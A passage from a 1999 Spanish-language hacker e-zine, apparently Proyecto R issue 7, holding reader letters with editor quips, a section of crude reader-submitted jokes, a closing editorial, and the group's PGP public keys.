~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Subject: hola yo soy de mexico
	 Date: Thu, 5 Aug 1999 20:06:47 -0600
	 From: "miguel fernandez" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


que tal navregando me encontre con su pagina y quiero que sepan que he estado  
navegando por mas de 10 horas tratando de encontrar respuesta a como puedo 
hacer para romper los candados que algunos juegos de playstation tienen para 
copiar,  no se si llegue al sitio correcto espero la respuesta gracias.

    [Tkr: Has probado con un martillo..??? ]
 
mi e-mail  es 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Subject: MKLINUX TEAM
	 Date: Tue, 10 Aug 1999 06:27:37 +0200 (GMT+02:00)
	 From: jose roberto flores rosales <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


 Primero que todo, quiero felicitarlos por su excelente e-zines.
 Soy adicto a el desde mas o menos un mes pero ya los he leido casi todos, ya 
 que estan muy buenos, y ademas son chilenos.
 
 Bueno les cuento vivo en Valdivia, Cuento con un grabador de cd´s, por lo 
 tanto podria ayudarles a grabar por estos lados del pais. 
 El problema es que todavia no me he consegido ningun linux, aunque tengo 
 posibilades de conseguir la  red-hat 6.0 pero no se pa´cuando.

 Si pudieran hacerme llegar alguna, mandenme un mail como lo hago para tener 
 alguna version. 

 Luego de tener alguna version solo con que me traigan el cd o por 00 
 podria grabarle el S.O. a quie lo pidiera por estos lugares o mandarlo si 
 lo piden. 

 Envienme una respuesta a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

 Y sigan adelante con proyecto R

    [Tkr: Ok, por favor manda tus datos completos y te haremos llegar la 
    copia. (que educado estoy...)]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nota: Esta seccion se ha dejado sin editar por que los textos  son  propiedad
de los autores y no del Grupo en si.

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

20. ________________________________________ Chistes Cuentos y Otras Burradas
                                             By Varios

GRANDES DUDAS sobre nuestros personajes preferidos de la infancia... 

  1) Si habia un pitufo bebe, quien carajo se movia a Pitufina?!
  2) Por que mierda en Mazinger Z, a Afrodita nunca se le acababan los
  tetamisiles? 
  3) Como es posible que por un par de anteojos nadie se da cuenta que
  Clark Kent es Superman?... 
  Los ciudadanos de Metropolis son todos pelotudos? 
  4) Bruno Diaz: es un empresario corrupto?, si no es asi, por que
  siempre tiene guita y nunca se lo ve laburando? 
  5) Pluto: es un perro naranja? 
  6) Si Mickey es su amo? Que tama~o tiene ese raton? 
  7) Por que Mickey lleva pantalones y Minnie una blusa nada mas? 
  8) Que clase de engendro genetico es Goofy?. Si Pluto es un perro,
  Goofy? que es? 
  9) Donde corno estan los padres de Huguito, Paquito y Dieguito (los
  sobrinos del Pato Donald)? 
  10) Todos los personajes de Disney llevan guantes blancos, porque? 
  11) Como puede mantener el equilibrio el canario Twity (Piolin) con
  semejante cabeza? 
  12) Cuanto aguanta un coyote sin comer? Por que carajo invierte tanta
  guita en comprar tanto producto ACME y no se compra una hamburguesa y se
  deja de romper las bolas? 
  13) Por que Pedro Picapiedra cuando corre pasa siempre por la misma casa?
  14) No se le gastan los pies al manejar el troncomovil? 
  15) Si Popeye y Olivia no mantienen nunca relaciones, de donde mierda
  sale Cocoliso, y por que se parece tanto a ambos? 
  16) Por que un tipo como Brutus se hace tanto la cabeza por una mina
  como Olivia ... que sinceramente es un desastre?. 
  17) Como puede el abuelo de Heidi mantener un chalet en las monta~as y a
  una familia con la pension de mierda que cobra un jubilado? 
  18) Que hace Clarita paseando por el prado en silla de ruedas? 
  19) Pedro, es puto?; tuvo 10.000 oportunidades de voltearse a Heidi
  cuando llevaban las cabras a las monta~as y nunca le toco ni una gomita. 
  20) No sera que se curtia a las cabras? 
  21) Por que a los enanitos de Blancanieves no se les respeta llamandolos
  "personas bajitas"? 
  22) Que clase de sustancia psicotropica toman para que despues de 20hs
  de trabajo, salgan de la mina cantando? 
  23) Por que los enanitos no eran ni 8 ni 6?, sino 7, como los 7 pecados
  capitales o los dias de la semana. Como era la historia?, cada enano tenia
  un día asignado de la semana para curtirse a Blancanieves? 
  24) En que se parece una abuelita a un lobo feroz para pasar inadvertido
  en camison? 
  25) Como es que Caperucita tuvo que pedir tantas pistas para darse
  cuenta de que su abuela era un lobo? Estaba falopeada? o simplemente de
  boluda que es?
  26) La Pantera Rosa, fue la primer expresion de la cultura gay que se
  transmitio masivamente? 
  27) Que era La Pantera, el o ella?? Se habia operado, no?? por que
  estaba siempre en bolas y no se le veia nada? 
  28) El oso hormiguero, tan pelotudo podia ser que solo le interesaba
  morfarse a una hormiga que tenia cara de piedra? 
  29) Por que al Increible Hulk se le rompe siempre toda la ropa excepto
  los pantalones? Son elastizados? 
  30) A Mazinger Z, no se le paraban los cohetes cuando veia a Afrodita,
  que por cierto tenia unas gomas barbaras? 
  31) Como es posible que los 3 chiflados se lleven tan mal y sin embargo
  siempre vivieron juntos? 
  32) La familia Ingalls cada vez eran mas hermanos, Como hacian los
  padres para curtir, si dormian practicamente todos juntos? Armaban
  verdaderas orgias?  
  33) El Sr. Edwards tenia onda con Laura Ingalls?

Colaboracion de Martin Larralde
Desde Buenos Aires Argentina



Los Gerentes .... 

    Cuentan : 
    Que un gerente muy importante de una conocida 
    multinacional tuvo una crisis cardiaca por culpa del 
    trabajo.  Fue dado de baja y enviado al campo con el 
    objeto de recuperar fuerzas y relajarse un poco. 
    Despues de pasar dos dias sin hacer nada, el hombre 
    estaba harto de la vida bucolica y pastoril, y se 
    aburria soberanamente. Asi que decidio hablar con el 
    granjero que le hospedaba y solicitarle alguna tarea 
    sencillita para pasar el rato y ocupar el tiempo, a 
    la vez que asi hacia algo de ejercicio. 
    Al dia siguiente se levantaron temprano, antes que 
    saliera el sol. 
    El granjero, conocedor de la idiosincrasia de la 
    gente de la ciudad, y temiendo algun da~o 
    irreparable, resolvio asignarle tareas simples en las 
    que no pudiera causar da~o alguno incluyendose a el 
    mismo. la tarea es muy sencilla, dijo el granjero 
    dandole una pala; tiene que recoger el estiercol que 
    hay en el chiquero de los cerdos y repartirlo por el 
    sembrado para abonarlo. "cuando termine venga a verme" 
    El granjero era propietario de mas de doscientos 
    cerdos, y el estiercol se acumulaba hasta la altura 
    de la rodilla.  Asi que el hombre estimaba que esta 
    faena le llevaria al gerente dos o tres dias.  Cual 
    fue la 
    sorpresa, cuando al cabo de tres horas aparecio el 
    gerente, lleno de estiercol hasta las orejas, 
    sonriente y con cara de satisfecho " ya he terminado" 
    dijo. 
    Viendo que en efecto la tarea estaba terminada, y 
    ademas con eficiencia, el granjero decidio asignarle 
    otra.  " bien hay que sacrificar unos pollos que 
    ma~ana vienen a recoger los de la carniceria.  Basta 
    con cortarles la cabeza", dijo dandole un enorme 
    cuchillo " es un poco mas complicado pero seguro 
    puede hacerlo" 
    Habia mas de mil quinientos pollos para sacrificar, y 
    supuso que el gerente no terminaria hasta bien 
    entrada la noche.  Incluso penso en ayudarle mas 
    adelante  cuando terminara de recoger la siembra. 
    Apenas habian pasado un par de horas el gerente se 
    presento ante el con toda la ropa y la cara manchada 
    de sangre, el cuchillo mellado, y sonriente como un 
    ni~o en el dia de los reyes magos "ya he terminado" 
    dijo.  El granjero no salia de su asombro. 
    Es increible !!!!!! ni yo mismo acostumbrado a la dura 
    vida rural, no lo hubiera hecho mejor. 
    Los milquinientos pollos estaban amontonados en un 
    lado y las mil 
    quinientas cabezas en el otro lado!!!.  El granjero 
    se rasco la cabeza pensativo. Llevando al gerente 
    junto a un gran monton de papas y le dijo " muy bien. 
    ahora hay que separar las papas. Las grandes a un 
    lado y las peque~as al otro" El granjero penso que, 
    en menos de una hora, veria otra vez al gerente 
    pidiendole mas trabajo...... Pero no fue asi.  Paso 
    la hora de comer, la hora de cenar, se hizo noche, y 
    el gerente no aparecia. 
    Creyendo que algo le habra sucedido, el asustado 
    granjero fue a donde habia dejado al gerente,y se lo 
    encontro sentado delante del mismo monton de papas,sin 
    que hubiera separado ninguna. "le pasa algo ? " 
    pregunto extra~ado. El gerente se volvio con un papa 
    en la mano y le contesto " mire: repartir mierda y 
    cortar cabezas es algo a lo que estoy muy 
    acostumbrado..............PERO ...........ESTO DE 
    TOMAR DECISIONES.............!!!!! " 

Colaboracion de Karen Alexandra Gaitan
Desde Cali - Colombia




Estan la Bella Durmiente, Pulgarcito y Don Juan platicando. Cuando en eso
menciona la Bella Durmiente

-"Yo soy la mujer mas bella del mundo"

-"No, no lo eres - Le dicen Don Juan y Pulgarcito

Luego Pulgarcito dice

-"Yo soy el hombre mas peque~o del mundo"

- No, no lo eres - Dicen la Bella Durmiente y Don Juan

Don Juan muy seguro de si dice -"Nadie en el mundo ha tenido mas amantes
que yo"

- No es cierto - Le responden la Bella Durmiente y Pulgarcito

Como no se ponian de acuerdo, decidieron ir con Merlin para que el don de
su sabiduria le diera validez a sus afirmaciones.

Entra la Bella Durmiente a hablar con Merlin y al rato sale y Dice

- Merlin dice que si soy la mas bella del mundo

Sigue Pulgarcito, habla con Merlin y a los minutos sale muy contento

- Merlin esta de acuerdo conmigo de que soy el hombre mas peque~o

Por ultimo entra Don Juan y despues de un buen rato sale super enojado y
dice

- Quien diablos es Bill Clinton?


Cristina Guzman de Diaz
Cali - colombia


Estadisticas. 
Rigurosos estudios cientificos, han determinado que el acto sexual dura 
no menos de 8 minutos, durante los cuales, el promedio de penetracion del 
pene en la vagina es de 30 veces por minuto, lo cual indica que en el acto 
sexual existen 240 penetraciones por minuto; puesto que el pene tiene un 
tama~o promedio de 15 centimetros significa que la mujer le son 
introducidos 3.600 centimetros, es decir 36 metros de pene por cada 
relacion sexual. 
Dado que generalmente las mujeres hacen el amor 3 veces por semana y como 
el ciclo anual consta de 52 semanas, llevan a cabo en promedio el amor un 
total de 156 veces al a~o. Esto quiere decir que en resumen, como minimo 
reciben 5.885 metros de pene anualmente, lo que es igual a 6 kilometros de 
pene por a~o, dicho de otra manera 1/2 kilometro mensual. 
Asi que amiga mia si usted no ha recibido aun a esta altura del a~o su 
kilometraje correspondiente, permita que su pareja (o quien mas le agrade) 
le ayude a conseguir el kilometraje al que tiene usted todo el derecho del 
mundo. 
Tenga en cuenta, ademas, que esta cientificamente comprobado que unos 
metros de mas no le haran da~o alguno, todo lo contrario. Se mantendra 
usted perfectamente lubricada, en una excelente forma fisica y sobre todo 
muy, pero muy contenta. 

Victoria Eugenia Yepes
Cali - Colombia

LA LISTA DE NOE
Estaba Noe tomando lista a los animales que llevaria. Como no conocia a
todos de paso conocia especies nuevas y ademas se aseguraba de no
repetir las parejas.
Llega uno de los animales desconocidos por Noe y le pregunta:
- Que eres?
- Perro Lobo
- Mmmmhhhh... En la lista no aparece ningun "Perro Lobo"
- Mi papa era un perro y mi mama una loba, y como no habia ni perra ni
lobo, bueno, de ahi salgo yo...
- Ah! Adelante entonces
Otro animalito algo raro:
- Que eres?
- Sapo Rana
- No... no estas, aqui hay sapo de rio, sapo de tierra, pero "Sapo Rana" 
  no hay...
- Es que mi papa era un sapo y mi mama una rana, y bueno, como usted
  comprendera que ante la necesidad... de ahi sali yo....
- Esta bien, adelante...
Llega un tercer animal muy raro, con una gran trompa:
- Y tu que eres?
- Oso Hormiguero
- Oso Hormiguero? Oso Hormiguero? Noooo... a mi no me van a seguir
  enga~ando !!

Colaboracion de Luis Andres Delgado Lisiñska
Desde Cali - Colombia

La misa del Domingo en la maniana se desarrollaba en una forma bastante
normal, cuando de repente una gran nube de humo con olor a azufre aparecio
en frente del pulpito, seguido de un estruendoso: " BUUM!". Cuando el humo
se esparcio, los asustados feligreses vieron una roja figura, completa con
cuernos, una larga cola y trinche en mano.

El panico se apodero de la gente. Todos corrieron y se agolparon en la
puerta, pugnando por salir desesperadamente. Satanas observaba toda la
gente con una amplia sonrisa, pero de pronto observo a un hombre aun
sentado en su asiento.

"Es que no sabes quien soy?", Satanas pregunto

La respuesta del hombre fue simple, " Claro que lo se."

Satan mostro asombro. "


No me temes?"

"No."

"Por que no?

"Como te tendria miedo a ti, si he estado casado con tu hermana por 35
anios!"


Carlos Alvario R.
Guayaquil-Ecuador


      Hombre inteligente + Mujer inteligente = Romance
      Hombre Inteligente + Mujer Tonta = Affair
      Hombre Tonto + Mujer Tonta = Embarazo
      Hombre Tonto + Mujer Inteligente = Boda
      Jefe Inteligente + Empleado Inteligente = Utilidades
      Jefe Inteligente + Empleado Tonto = Productividad
      Jefe Tonto + Empleado Inteligente = Ascenso
      Jefe Tonto + Empleado Tonto = Horas Extras
      Un hombre paga [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt] por un producto de 1$ que necesita
      Una mujer paga jumi por un producto de 2$ que no necesita
      Una mujer se preocupa por el futuro hasta que encuentra marido
      Un hombre no se preocupa por el futuro hasta que se casa
      Un hombre exitoso es aquel que gana mas dinero del que su mujer gasta
      Una mujer exitosa es aquella casada con un hombre exitoso.
      Para hacer feliz a un hombre debes entenderlo bien y querelo un poco
      Para hacer feliz a una mujer debes quererla bien y no intentar entenderla
      Los hombres casados viven mas que los solteros..., pero los casados
        desean morirse mas que los solteros.
      Los hombres casados deberan olvidar sus errores, no tiene sentido que
        dos personas esten recordando lo mismo.
      Los hombres despiertan tan guapos como estaban al acostarse.
      Las mujeres, por alguna razon se deterioran durante la noche.
      La mujer se casa esperando que el cambie, pero el no cambia.
      El hombre se casa esperando que ella no cambie, pero ella cambia.
      La mujer siempre tiene la ultima palabra en toda discusion.Cualquier
        cosa que el diga despues sera el inicio de otra discusion.
      Hay dos momentos en los que el hombre no entiende a una mujer: antes
        de casarse con ella, y despues de casarse con ella.


Liliana Segura
Cali - Colombia

LA CANCION DEL PROGRAMADOR BORRACHO

100 errores en el programa
100 peque~os errores en el programa
corrijo uno, lo compilo de nuevo
101 peque~os errores en el programa
101 errores en el programa
101 peque~os errores en el programa
corrijo uno, lo compilo de nuevo
102 peque~os errores en el programa

(repetir hasta que no queden errores)


Un error en un programa se puede convertir en una funcion mas,
incluyendolo en el manual
con la documentacion necesaria.


Si un programa hace una cosa diferente a lo que sus comentarios indican,
lo mas probable
es que los dos sean incorrectos.


- Cual es la diferencia entre un hacker y un usuario tipico ?
- Un usuario tipico quiere comprar un ordenador rapido para pasar menos
tiempo con el.

--
-----
Jose Luis Morales G.
Ingeniero de Sistemas
Telesat S.A.
Cali - colombia


Similitudes entre las mujeres y la computadoras. 

   Tardan en arrancar. 
   No son capaces de pensar por su cuenta. 
   Pensar no piensan, pero tienen una memoria........ 
   Te dejan colgado en el momento mas inoportuno. 
   Siempre nos acordamos de la primera que tuvimos. 
   A poco de tener una ya quieres tener otra mejor. 
   Cuanto mas dinero tengas, sera mejor la que obtengas. 
   No podemos cambiarla tanto como quisieramos. 
   Tanto unas como otras tienen su propio lenguaje. 
   Cuando se enchufan por telefono pierden un monton de tiempo. 
   Cuanto mas importante sea el despacho, las habra de mejor 
   calidad. 
   Las mas caras suelen ser las mejores. 
   Ambas estan dotadas de diversas ranuras. 
   Cuando se conectan dos o mas, intercambian todo tipo de 
   informacion. 
   A ambas les encantan las tarjetas. 
   Si estas mucho tiempo frente a una acabas con dolor de 
   cabeza. 
   Pasas mucho mas tiempo poniendola a punto que disfrutandola. 
   Nunca te satisface del todo lo que has hecho con ellas. 

Colaboracion de Liliana Cristancho
Cali - Colombia

 LA MONJA:
     
     
     Una monja se sube a un taxi y el taxista no para de mirarla.
     Entonces ella le pregunta porque la mira tanto.
     "Tengo una pregunta pero no quiero ofenderla".
     Ella responde: "Querido hijo, no puedes ofenderme. Cuando se llega a 
     mi edad siendo monja ves y escuchas de todo. Estoy segura que no hay 
     nada que pudieras decir que me ofenda".
     "Bueno, Siempre he tenido una fantasia que una monja realizaba un 
     felatio conmigo".
     Ella responde, " Bueno, veamos que podemos hacer con respecto a eso: 
     1) tienes que ser soltero y 2)debes ser Catolico".
     El taxista se emociona y dice:" Si, soy soltero y tambien catolico!!!"
     La monja le dice:"Bueno doble en la proxima esquina a la derecha".
     El taxista dobla y la monja le concede el deseo. Pero cuando se 
     vuelven a subir al taxi, el taxista comienza a llorar.
     
     "Hijo querido, porque lloras?"
     "perdoneme hermana pero he pecado, menti, debo confesar, soy casado y 
     Judio."
     
     La monja le dice, "Bueno no te preocupes, mi nombre es Carlos y estoy 
     yendo a una fiesta de disfraces".

Jhon Navarrete 
desde Cali - colombia


Frei 50 anos despues (este Chiste es especial para chilenos)

Resulta  que nuestro actual presidente Frei, ya casi concluido su mandato y 
  
hastiado de crisis asiatica, cortes de luces, viviendas inundadas,  
extradicion de Pinochet, etc. decide mandarlo todo a la misma cresta y  
olvidarse por un tiempo de este Chile tan desagradecido con todo aquel 
que quiera hacer algo por el.

Para  ello y quizas de forma un poco tajante e irreflexiva decide irse a
New York y meterse en criogenia (hibernacion) por 50 largos anos. Asi lo  
hace y una vez cumplido este plazo es despertado por una  enfermera de blanco 
que le comunica que el "tratamiento" se ha cumplido  y que puede retomar 
sus actividades normalmente.

Frei ya bastante descansado despues de la "pesta~ita", se dirige al 
aeropuerto y como el hombre esta acostumbrado a viajar en lo mejor,  
solicita el primer vuelo a Chile en la mejor linea aerea, por lo que la  
buena moza le da un pasaje, el hombre se dirige al punto de embarque  
desde el cual se distingue un avion, muy superior en  modernidad y tamano a 
los demas; en el costado puede leerse  claramente "Space Chile". Pregunta 
anonadado si esta  linea tiene que  ver algo con la antigua Lan Chile, a lo 
que el encargado contesta que  esta es la filial espacial de la linea mas 
importante del mundo "Lan  Chile". 

Asombrado se sube al mega avion y toma asiento, cuando  pasa una aeromoza 
sirviendo vino chileno, le pregunta a que hora llega  el avion a Santiago,  
la azafata le responde que 30 minutos. Frei no  cabe en su estupor y  
creyendo haberse equivocado de avion pregunta si  este es el vuelo que va a 
Santiago. Si, este es - le contesta la  azafata, lo que sucede es que usted 
viaja en un "Pillan 5000",  la mas alta tecnologia en aeronautica,  
construido integramente en  Chile; es el unico avion capaz de volar fuera 
de orbita, a una  velocidad 10 veces superior a la del sonido. 

Bueno Frei tiene  un viaje tranquilo y corto en aerolineas "Space Chile", 
aterrizando 30  minutos despues en Santiago. Al bajar del avion queda
asombrado  del avance tecnologico y la envergadura del aeropuerto, a la  
distancia  se ve algo parecido a un transbordador espacial. Con una 
sonrisa  de orgullo comenta a un pasajero lo grande del aeropuerto, el  
cual sin inmutarse le contesta que es el mas grande y moderno del  mundo.

Nuestro amigo se dirige a la calle y el primer nivel de  la autopista de  
tres pistas, espera un taxi, de pronto ve aparecer un  auto sin ruedas que  
levitando se detiene ante el, en la marca de  fabrica se ve claramente el 
escudo nacional y tres letras "CIC". Se  sube y le pide que lo lleve al 
palacio presidencial de La  Moneda, a lo que el chofer le corrige, "Ud se 
refiere al museo de la moneda"

(dudoso) "Que ya no esss el palasscio  presscidencial?" --- "No, ya no, es  
que se quedo chico, pero al frente esta el edificio mas alto del mundo,  
sede de nuestro poder administrativo, lo llevo alla?"

"Bueeno" Por el camino se va conversado, mientras ve a un lado y a otro  
carreteras de 3 y 4 niveles, un tren monorriel, el rio mapocho de  
cristalinas aguas con patos y cisnes, y a gente pescando desde la orilla,  
lo que se ve muy  pintoresco, sobre todo con el cielo de un azul intenso. 

Finalmente el chofer para frente a un gigantesco rascacielos. "Llegamos  
se~or" - dice el chofer mientras se abre la puerta automatica del auto.
  
"Musshas grasscias, pusshas que ha cressscido, Santiago ah?"
  
"La ciudad mas moderna del mundo senor" 

"Bueno, cuanto le debo"

"Solo tres Lavines senor".  (PLOP)

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

21. _______________________________________________________________ Shutdown
                                                                    By Editor

Una  e-zine  mas  terminada,  depues  de  pasar  por  varios pc's, despues de 
acomodarla como 3 veces, porque se nota la diferencia entre el editor DOS del 
NT y el de Windows 95, pero bueno, la proxima no me ocurrira, eso me pasa por
gastar  tiempo  de  mi  trabajo editando la e-zine, prometo que la proxima la 
hare completamente en mi casa..!!! XDDD aunque no me paguen Extras..!!!

Bueno,  fue  un placer haber escrito estas cortas lineas para ustedes, espero 
que  tambien  lo  haya  sido para nuestros colaboradores, como pudieron darse 
cuenta, en este numero incluimos muchas cosas, de todo para todos, Linux, NT, 
empezamos  desde el siguiente con la seccion de phreak apoyados por Moonspell 
y  Nykkro-Damage,  etc,  etc, etc, seguimos esperando tener el servidor listo 
pronto,  ahi  pondremos  la  mayoria  de  herramientas  que  nombramos en los 
articulos  (o  por  lo  menos  espero  que asi sea..), o sea, como pueden ver 
muchas cosas nos esperan...

Bye.

Nos vemos en la Numero 8.

Que  cuando  sale..??, pues la verdad no se, esta estaba programada para hace 
casi  un  mes,  pero  el  tiempo nos devora, y a veces no es suficiente estar 
despierto durante 20 horas al dia para hacer todo lo que hay que hacer.

De todas formas, aunque parezca que no volveremos, simpre estamos ahi, no nos 
dejaremos  vencer de nada ni de nadie, asi que esten dando vuelta por su casa 
constantemente  (lease  http://www.cdlr.org),  y  el  dia  menos  pensado ahi 
encontraran, vuestra e-zine.

Pd. Se habran dado cuenta que Arcangnet no aparecio  en este numero, pues les 
cuento  que  esta disfrutando de un merecidisimo castigo en otro pais, espero
volverlo a leer Pronto.

No, no crean que esta en la  cana, simplemente la empresa donde trabaja se lo 
llevo a trabajar a otro lado.

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

22. ______________________________________________________________ Llaves PGP
                                                                   By CDLR

Proyecto R

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

mQGiBDd46gQRBADF3QWUv34R4FC3lksCOu4MHVwSaD8gb9yk7e+9T2PGmevc24tH
9P4GemCgcTFaDrovTiy5HLO0eLhOjjqw6GTcJzn0OboqbRng7MdSF6Oe+zcx3wcs
fzu7k/gbiABjOWuYQk8U3nuE9XbOKCJRnInJD/jsDryxlNR6f/mlxD4yHwCg/8h4
aAHuceLsX6gjAKrRgC/n1xUEALagnmLcepP/cbzOx6LvkJ2hgggyiv/tySuYG6ru
CtCa+47w5ieLV+Bnn0xoLKI+W7L677YW7gwxu/wabN3p5roGFeOYGPK5XWlYgPEZ
kS7940dV+UDj4/GroGVGOYeS8CLkZEXiJ+TnNgPawOWoezLuTpK/A5MfYFRE3R3I
SO9+A/98dFHn9RNOO+QrTdneWQQ+08m1axA6hFBhKRdZFic6jY3VKDWdzjiO21zK
p+r+A6wliFIIdx6M5XutmaLF5MPR2M/iEDX0GXkU59RQdQDklq5aFSIaJR1IEREk
yLaqk71Bg7o1P7NFGMQgCiwYvy12M3P1ImvAdL/h0ZJz2zxX/7QjUHJveWVjdG8g
UiA8cHJveWVjdG9fckBiaWdmb290LmNvbT6JAEsEEBECAAsFAjd46gQECwMCAQAK
CRC1LeRgDBehHijMAJsGZJrXKmzXrVPsrLr0bP9ha8reMwCfc85v0HREnLzn6AEP
aemT+hcKSXS5Ag0EN3jqBBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg
2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvO
meFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YA
WCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtV
jLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZ
lp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIAIWnYskVNAQe
xs/iPrHh2Ac+fsyEdRXqpJLXFZmT39xjMJi+r2lCHyo03m5wtUigNfvNCV39emty
git0cAmkQzLUrOlmtYW+vpOOtdPOzYwUkP3MT43rl2AOcMPgSMUHM+yDpGZfKA+e
BG91ETNdFMeqPnytvC90qU8P8CQkigWAJsT/Hpo8Tm0WTg+f6byQOpMaumjVojiH
4eYWExOz2MdYb0m7xbnGy7soINScVAqVfeRzc0hyQN2EknZUy61N5ixX4DoGKSbi
5jkht9+TQzIF02g5yPoHpvyg0cmDaoXWA4TpNgvQFVac72R+JAsCt28Xl/BDKpnM
g0Rzl/iHlv+JAEYEGBECAAYFAjd46gQACgkQtS3kYAwXoR7snQCeKwWH/U9YCq8r
JOPOxtJNgDatgX0AoM079AmxEqf3AsnFxGCzujx/p1/0
=KceG
-----END PGP PUBLIC KEY BLOCK-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PlaXiuS

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

mQENAzXQft8AAAEIAMEHngCERPQxki4D8A41ywn2NiUVkpOVF/LTQ5wOLBMm/2Xs
RYEtFXvOpwyL+JYunY6QIcSmCGgAsrDZBV2pBFdzVENzMeiKhfIBWhBB9H9Q+Tkw
7ps88fenespdw1QEVFxXkRtGnqNTOZAK7o987BRCiCSGDDZ9Plrg48tO8jM3R/tG
4LEKgXqqWJnvqY22iYgwZpMSBt7JhRZ3eUxKSeTEInOr8BtIljbRRArHETqGOAjy
dTkZUEPbEw+On2OPDcQm25WHq8/WjMAcPL+k28m4KsbY7b9GywcfwWH6PhjcgDvF
UvGi+auahjept9aFtn/fEqU6yLtoxPsnRpY3lOEABRG0HVBsYVhpdVMgPHBsYXhp
dXNAYmlnZm9vdC5jb20+iQEVAwUQNdB+38T7J0aWN5ThAQH1SQf/bvltiOQprsq1
LwqRUt3lkuZaDHNKfjYz8mJpv5dPzJ+X4uI9cKauC2L8WFYGeb+KVI6nfb+VRr+T
coG8CKCaGIEaYISoatetDN2IjvgUrXc7FxzlUXotMC+MZLZOWxnd3+J78dO/T0zC
OgteCdi5nZYfIJJooUObQ01PcgEG7hmyjGUGCtBIoyzbXdJAJN7jzBZYviq5MATB
oOZSI4W433kw6wwZcvaLsDZVo6frhsqllYEwhK4lTrxyeC0f+fk25hT63d2YLprr
u4LFsTtvpze7K/856UifF1Er4WBRtQ+ZEAsqKQXPD64gtaF82IJ9FFLLJBIPpoeU
OfrQ87c5Ow==
=bweu
-----END PGP PUBLIC KEY BLOCK-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AndyK

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

mQGiBDdcbHIRBADspRm0+1LjKHP7pwKEGS57g8VQ3iJQi/bqj2wkITtNotJpICYC
Nt2WtiU/KZomjGVgpMMnp0EZYjEvjGwccqjSeFz0EM7nX+JDKzNKnyCfWymNTPoC
V3rhdD7Kkb7QeHPyWGBirmTv4u/tzakfh4aAqoTNcFXVcuvtcM+1u6CNZwCg/2xb
YI8+RvxVKMtKvLcj9+RbQQUEANbhDcYPJ4yYfVz4MDdGn4iXTzGo5/TLc4w2/glZ
yaUp/69VBdaES5NJCO09m7K3w7uu27F3gtKrdHhJ42lTxrVBhavoNg0r1NfsiYRk
mhK54R2yoY/LL0LyPTFwotQj8MshGAlUTTwc/uRAw4/tHDRG/+FM/o37ZRnOLreU
ha+cA/95t8Xp/zI+n/hSNyDgbTTwS1CXCDhKbU0Iz88w2qCZDfwX+IMZMcGgxl3O
bTUKdbb7YMS8TDqI3hQ0vgVZDh9m0zPk2GZ/yursKOTT1NugGKUu60/f0X8SCzxx
trmLvvbQGyRymkLMSFiEdMq8Dv6PWELYW2Bf3XsO1hsojmqaAbQlQW5EeUsgR29v
ZEJveSA8YW5keWtoYWNrQGhvdG1haWwuY29tPokATgQQEQIADgUCN1xscgQLAwIB
AhkBAAoJEEBD6+nUJjNkExQAoIeLqVYFXvKQ3pA1kCoSvKryo848AKDDYZIZIDfE
CtU4I0mSrElq9TJVk7kCDQQ3XGxyEAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bx
brlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJP
PT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrU
GvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVb
GI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcp
